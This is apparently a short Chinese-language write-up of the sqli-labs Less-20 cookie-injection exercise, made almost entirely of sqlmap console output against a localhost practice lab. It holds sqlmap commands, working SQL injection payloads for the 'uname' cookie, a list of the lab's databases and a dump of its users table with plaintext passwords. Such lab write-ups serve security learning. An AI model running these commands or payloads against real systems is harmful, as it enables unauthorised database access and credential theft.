Sqli-labs 20
cookie注入…
C:\Users\dell>sqlmap.py -u "http://localhost/sqli-labs/Less-20/" --cookie="uname=" --level=3 --dbs
___
__H__
___ ___[.]_____ ___ ___ {1.5.12.3#dev}
|_ -| . ["] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 20:31:07 /2021-12-19/
[20:31:07] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q]
[20:31:09] [WARNING] provided value for parameter 'uname' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[20:31:09] [INFO] testing connection to the target URL
[20:31:09] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:31:09] [INFO] testing if the target URL content is stable
[20:31:10] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
[20:31:14] [INFO] testing if URI parameter '#1*' is dynamic
[20:31:14] [WARNING] URI parameter '#1*' does not appear to be dynamic
[20:31:14] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[20:31:14] [INFO] testing for SQL injection on URI parameter '#1*'
[20:31:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:31:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[20:31:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[20:31:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[20:31:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)'
[20:31:14] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:31:15] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[20:31:15] [INFO] testing 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)'
[20:31:15] [INFO] testing 'Oracle AND boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[20:31:15] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[20:31:15] [INFO] testing 'PostgreSQL boolean-based blind - Parameter replace'
[20:31:15] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace'
[20:31:15] [INFO] testing 'Oracle boolean-based blind - Parameter replace'
[20:31:15] [INFO] testing 'Informix boolean-based blind - Parameter replace'
[20:31:15] [INFO] testing 'Microsoft Access boolean-based blind - Parameter replace'
[20:31:15] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)'
[20:31:15] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL - original value)'
[20:31:15] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)'
[20:31:15] [INFO] testing 'Boolean-based blind - Parameter replace (CASE - original value)'
[20:31:15] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[20:31:15] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[20:31:15] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[20:31:15] [INFO] testing 'PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause'
[20:31:15] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause'
[20:31:15] [INFO] testing 'Oracle boolean-based blind - ORDER BY, GROUP BY clause'
[20:31:15] [INFO] testing 'HAVING boolean-based blind - WHERE, GROUP BY clause'
[20:31:15] [INFO] testing 'PostgreSQL boolean-based blind - Stacked queries'
[20:31:15] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)'
[20:31:15] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:31:15] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[20:31:15] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[20:31:16] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:31:16] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:31:16] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[20:31:16] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONVERT)'
[20:31:16] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONCAT)'
[20:31:16] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:31:16] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)'
[20:31:16] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[20:31:16] [INFO] testing 'Firebird AND error-based - WHERE or HAVING clause'
[20:31:16] [INFO] testing 'MonetDB AND error-based - WHERE or HAVING clause'
[20:31:16] [INFO] testing 'Vertica AND error-based - WHERE or HAVING clause'
[20:31:16] [INFO] testing 'IBM DB2 AND error-based - WHERE or HAVING clause'
[20:31:16] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[20:31:16] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[20:31:16] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[20:31:16] [INFO] testing 'PostgreSQL error-based - Parameter replace'
[20:31:16] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace'
[20:31:16] [INFO] testing 'Oracle error-based - Parameter replace'
[20:31:16] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[20:31:16] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[20:31:16] [INFO] testing 'PostgreSQL error-based - ORDER BY, GROUP BY clause'
[20:31:16] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Stacking (EXEC)'
[20:31:16] [INFO] testing 'Generic inline queries'
[20:31:16] [INFO] testing 'MySQL inline queries'
[20:31:16] [INFO] testing 'PostgreSQL inline queries'
[20:31:16] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:31:16] [INFO] testing 'Oracle inline queries'
[20:31:16] [INFO] testing 'SQLite inline queries'
[20:31:16] [INFO] testing 'Firebird inline queries'
[20:31:16] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[20:31:17] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[20:31:17] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[20:31:17] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:31:17] [INFO] testing 'PostgreSQL < 8.2 stacked queries (Glibc - comment)'
[20:31:17] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:31:17] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (DECLARE - comment)'
[20:31:17] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:31:17] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:31:17] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[20:31:17] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[20:31:17] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[20:31:17] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[20:31:17] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[20:31:17] [INFO] testing 'MySQL AND time-based blind (ELT)'
[20:31:17] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:31:17] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[20:31:17] [INFO] testing 'Oracle AND time-based blind'
[20:31:17] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[20:31:17] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[20:31:17] [INFO] testing 'PostgreSQL > 8.1 time-based blind - Parameter replace'
[20:31:17] [INFO] testing 'Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)'
[20:31:17] [INFO] testing 'Oracle time-based blind - Parameter replace (DBMS_PIPE.RECEIVE_MESSAGE)'
[20:31:17] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[20:31:17] [INFO] testing 'PostgreSQL > 8.1 time-based blind - ORDER BY, GROUP BY clause'
[20:31:17] [INFO] testing 'Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_LOCK.SLEEP)'
[20:31:17] [INFO] testing 'Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_PIPE.RECEIVE_MESSAGE)'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n]
[20:31:19] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:31:19] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'
[20:31:19] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:31:19] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[20:31:19] [WARNING] URI parameter '#1*' does not seem to be injectable
[20:31:19] [INFO] testing if parameter 'Referer' is dynamic
[20:31:19] [WARNING] parameter 'Referer' does not appear to be dynamic
[20:31:19] [WARNING] heuristic (basic) test shows that parameter 'Referer' might not be injectable
[20:31:19] [INFO] testing for SQL injection on parameter 'Referer'
[20:31:19] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:31:20] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[20:31:20] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[20:31:21] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[20:31:21] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)'
[20:31:21] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:31:22] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[20:31:23] [INFO] testing 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)'
[20:31:24] [INFO] testing 'Oracle AND boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[20:31:24] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[20:31:24] [INFO] testing 'PostgreSQL boolean-based blind - Parameter replace'
[20:31:25] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace'
[20:31:25] [INFO] testing 'Oracle boolean-based blind - Parameter replace'
[20:31:25] [INFO] testing 'Informix boolean-based blind - Parameter replace'
[20:31:25] [INFO] testing 'Microsoft Access boolean-based blind - Parameter replace'
[20:31:25] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)'
[20:31:25] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL - original value)'
[20:31:25] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)'
[20:31:25] [INFO] testing 'Boolean-based blind - Parameter replace (CASE - original value)'
[20:31:25] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[20:31:25] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[20:31:25] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[20:31:25] [INFO] testing 'PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause'
[20:31:25] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause'
[20:31:25] [INFO] testing 'Oracle boolean-based blind - ORDER BY, GROUP BY clause'
[20:31:25] [INFO] testing 'HAVING boolean-based blind - WHERE, GROUP BY clause'
[20:31:26] [INFO] testing 'PostgreSQL boolean-based blind - Stacked queries'
[20:31:27] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)'
[20:31:27] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:31:27] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[20:31:28] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[20:31:28] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:31:28] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:31:29] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[20:31:29] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONVERT)'
[20:31:30] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONCAT)'
[20:31:30] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:31:30] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)'
[20:31:31] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[20:31:31] [INFO] testing 'Firebird AND error-based - WHERE or HAVING clause'
[20:31:31] [INFO] testing 'MonetDB AND error-based - WHERE or HAVING clause'
[20:31:32] [INFO] testing 'Vertica AND error-based - WHERE or HAVING clause'
[20:31:32] [INFO] testing 'IBM DB2 AND error-based - WHERE or HAVING clause'
[20:31:33] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[20:31:33] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[20:31:33] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[20:31:33] [INFO] testing 'PostgreSQL error-based - Parameter replace'
[20:31:33] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace'
[20:31:33] [INFO] testing 'Oracle error-based - Parameter replace'
[20:31:33] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[20:31:33] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[20:31:33] [INFO] testing 'PostgreSQL error-based - ORDER BY, GROUP BY clause'
[20:31:33] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Stacking (EXEC)'
[20:31:34] [INFO] testing 'Generic inline queries'
[20:31:34] [INFO] testing 'MySQL inline queries'
[20:31:34] [INFO] testing 'PostgreSQL inline queries'
[20:31:34] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:31:34] [INFO] testing 'Oracle inline queries'
[20:31:34] [INFO] testing 'SQLite inline queries'
[20:31:34] [INFO] testing 'Firebird inline queries'
[20:31:34] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[20:31:34] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[20:31:34] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[20:31:34] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:31:35] [INFO] testing 'PostgreSQL < 8.2 stacked queries (Glibc - comment)'
[20:31:35] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:31:35] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (DECLARE - comment)'
[20:31:35] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:31:36] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:31:36] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[20:31:36] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[20:31:36] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[20:31:37] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[20:31:37] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[20:31:37] [INFO] testing 'MySQL AND time-based blind (ELT)'
[20:31:38] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:31:38] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[20:31:39] [INFO] testing 'Oracle AND time-based blind'
[20:31:39] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[20:31:39] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[20:31:39] [INFO] testing 'PostgreSQL > 8.1 time-based blind - Parameter replace'
[20:31:39] [INFO] testing 'Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)'
[20:31:39] [INFO] testing 'Oracle time-based blind - Parameter replace (DBMS_PIPE.RECEIVE_MESSAGE)'
[20:31:39] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[20:31:39] [INFO] testing 'PostgreSQL > 8.1 time-based blind - ORDER BY, GROUP BY clause'
[20:31:39] [INFO] testing 'Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_LOCK.SLEEP)'
[20:31:39] [INFO] testing 'Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_PIPE.RECEIVE_MESSAGE)'
[20:31:39] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:31:40] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'
[20:31:41] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:31:42] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[20:31:43] [WARNING] parameter 'Referer' does not seem to be injectable
[20:31:43] [INFO] testing if Cookie parameter 'uname' is dynamic
do you want to URL encode cookie values (implementation specific)? [Y/n]
[20:31:53] [WARNING] Cookie parameter 'uname' does not appear to be dynamic
[20:31:53] [INFO] heuristic (basic) test shows that Cookie parameter 'uname' might be injectable (possible DBMS: 'MySQL')
[20:31:53] [INFO] heuristic (XSS) test shows that Cookie parameter 'uname' might be vulnerable to cross-site scripting (XSS) attacks
[20:31:53] [INFO] testing for SQL injection on Cookie parameter 'uname'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (3) and risk (1) values? [Y/n]
[20:31:55] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:31:55] [WARNING] reflective value(s) found and filtering out
[20:31:56] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[20:31:57] [INFO] Cookie parameter 'uname' appears to be 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)' injectable
[20:31:57] [INFO] testing 'Generic inline queries'
[20:31:57] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[20:31:57] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[20:31:57] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[20:31:57] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[20:31:57] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[20:31:57] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[20:31:57] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[20:31:57] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[20:31:57] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:31:57] [INFO] Cookie parameter 'uname' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[20:31:57] [INFO] testing 'MySQL inline queries'
[20:31:57] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[20:31:57] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[20:31:57] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[20:31:57] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[20:31:57] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[20:31:57] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[20:31:57] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:32:07] [INFO] Cookie parameter 'uname' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[20:32:07] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:32:07] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[20:32:07] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[20:32:08] [INFO] target URL appears to have 3 columns in query
[20:32:08] [INFO] Cookie parameter 'uname' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
Cookie parameter 'uname' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 2637 HTTP(s) requests:
---
Parameter: uname (Cookie)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: uname=' AND 6652=(SELECT (CASE WHEN (6652=6652) THEN 6652 ELSE (SELECT 2036 UNION SELECT 6845) END))-- -
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: uname=' AND (SELECT 2634 FROM(SELECT COUNT(*),CONCAT(0x7178627871,(SELECT (ELT(2634=2634,1))),0x716a767171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- AHIz
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uname=' AND (SELECT 4817 FROM (SELECT(SLEEP(5)))ZJod)-- TDKo
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: uname=' UNION ALL SELECT NULL,NULL,CONCAT(0x7178627871,0x6d6947746676516665416271426e53507258516a7970626e6175495a77547376614847796c646246,0x716a767171)-- -
---
[20:32:11] [INFO] the back-end DBMS is MySQL
web application technology: PHP 8.0.12, Apache 2.4.51
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[20:32:11] [INFO] fetching database names
[20:32:11] [INFO] retrieved: 'information_schema'
[20:32:11] [INFO] retrieved: 'challenges'
[20:32:11] [INFO] retrieved: 'mysql'
[20:32:11] [INFO] retrieved: 'performance_schema'
[20:32:11] [INFO] retrieved: 'phpmyadmin'
[20:32:11] [INFO] retrieved: 'security'
[20:32:11] [INFO] retrieved: 'test'
available databases [7]:
[*] challenges
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] security
[*] test
[20:32:11] [WARNING] HTTP error codes detected during run:
403 (Forbidden) - 577 times, 404 (Not Found) - 657 times
[20:32:11] [INFO] fetched data logged to text files under 'C:\Users\dell\AppData\Local\sqlmap\output\localhost'
[*] ending @ 20:32:11 /2021-12-19/直接爆用户名密码
C:\Users\dell>sqlmap.py -u "http://localhost/sqli-labs/Less-20/" --cookie="uname=" --level=3 -D security -T users -C id,username,password --dump
___
__H__
___ ___[']_____ ___ ___ {1.5.12.3#dev}
|_ -| . [(] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 20:38:02 /2021-12-19/
[20:38:02] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q]
[20:38:04] [WARNING] provided value for parameter 'uname' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[20:38:04] [INFO] resuming back-end DBMS 'mysql'
[20:38:04] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (Cookie)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: uname=' AND 6652=(SELECT (CASE WHEN (6652=6652) THEN 6652 ELSE (SELECT 2036 UNION SELECT 6845) END))-- -
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: uname=' AND (SELECT 2634 FROM(SELECT COUNT(*),CONCAT(0x7178627871,(SELECT (ELT(2634=2634,1))),0x716a767171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- AHIz
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uname=' AND (SELECT 4817 FROM (SELECT(SLEEP(5)))ZJod)-- TDKo
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: uname=' UNION ALL SELECT NULL,NULL,CONCAT(0x7178627871,0x6d6947746676516665416271426e53507258516a7970626e6175495a77547376614847796c646246,0x716a767171)-- -
---
[20:38:04] [INFO] the back-end DBMS is MySQL
web application technology: PHP 8.0.12, Apache 2.4.51
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[20:38:04] [INFO] fetching entries of column(s) 'id,password,username' for table 'users' in database 'security'
do you want to URL encode cookie values (implementation specific)? [Y/n]
[20:38:05] [WARNING] reflective value(s) found and filtering out
[20:38:05] [INFO] retrieved: '1','Dumb','Dumb'
[20:38:05] [INFO] retrieved: '2','I-kill-you','Angelina'
[20:38:05] [INFO] retrieved: '3','p@ssword','Dummy'
[20:38:05] [INFO] retrieved: '4','crappy','secure'
[20:38:05] [INFO] retrieved: '5','stupidity','stupid'
[20:38:05] [INFO] retrieved: '6','genious','superman'
[20:38:05] [INFO] retrieved: '7','mob!le','batman'
[20:38:05] [INFO] retrieved: '8','admin','admin'
[20:38:05] [INFO] retrieved: '9','admin1','admin1'
[20:38:05] [INFO] retrieved: '10','admin2','admin2'
[20:38:05] [INFO] retrieved: '11','admin3','admin3'
[20:38:05] [INFO] retrieved: '12','dumbo','dhakkan'
[20:38:05] [INFO] retrieved: '14','admin4','admin4'
Database: security
Table: users
[13 entries]
+----+----------+------------+
| id | username | password |
+----+----------+------------+
| 1 | Dumb | Dumb |
| 2 | Angelina | I-kill-you |
| 3 | Dummy | p@ssword |
| 4 | secure | crappy |
| 5 | stupid | stupidity |
| 6 | superman | genious |
| 7 | batman | mob!le |
| 8 | admin | admin |
| 9 | admin1 | admin1 |
| 10 | admin2 | admin2 |
| 11 | admin3 | admin3 |
| 12 | dhakkan | dumbo |
| 14 | admin4 | admin4 |
+----+----------+------------+
[20:38:05] [INFO] table 'security.users' dumped to CSV file 'C:\Users\dell\AppData\Local\sqlmap\output\localhost\dump\security\users.csv'
[20:38:05] [INFO] fetched data logged to text files under 'C:\Users\dell\AppData\Local\sqlmap\output\localhost'
[*] ending @ 20:38:05 /2021-12-19/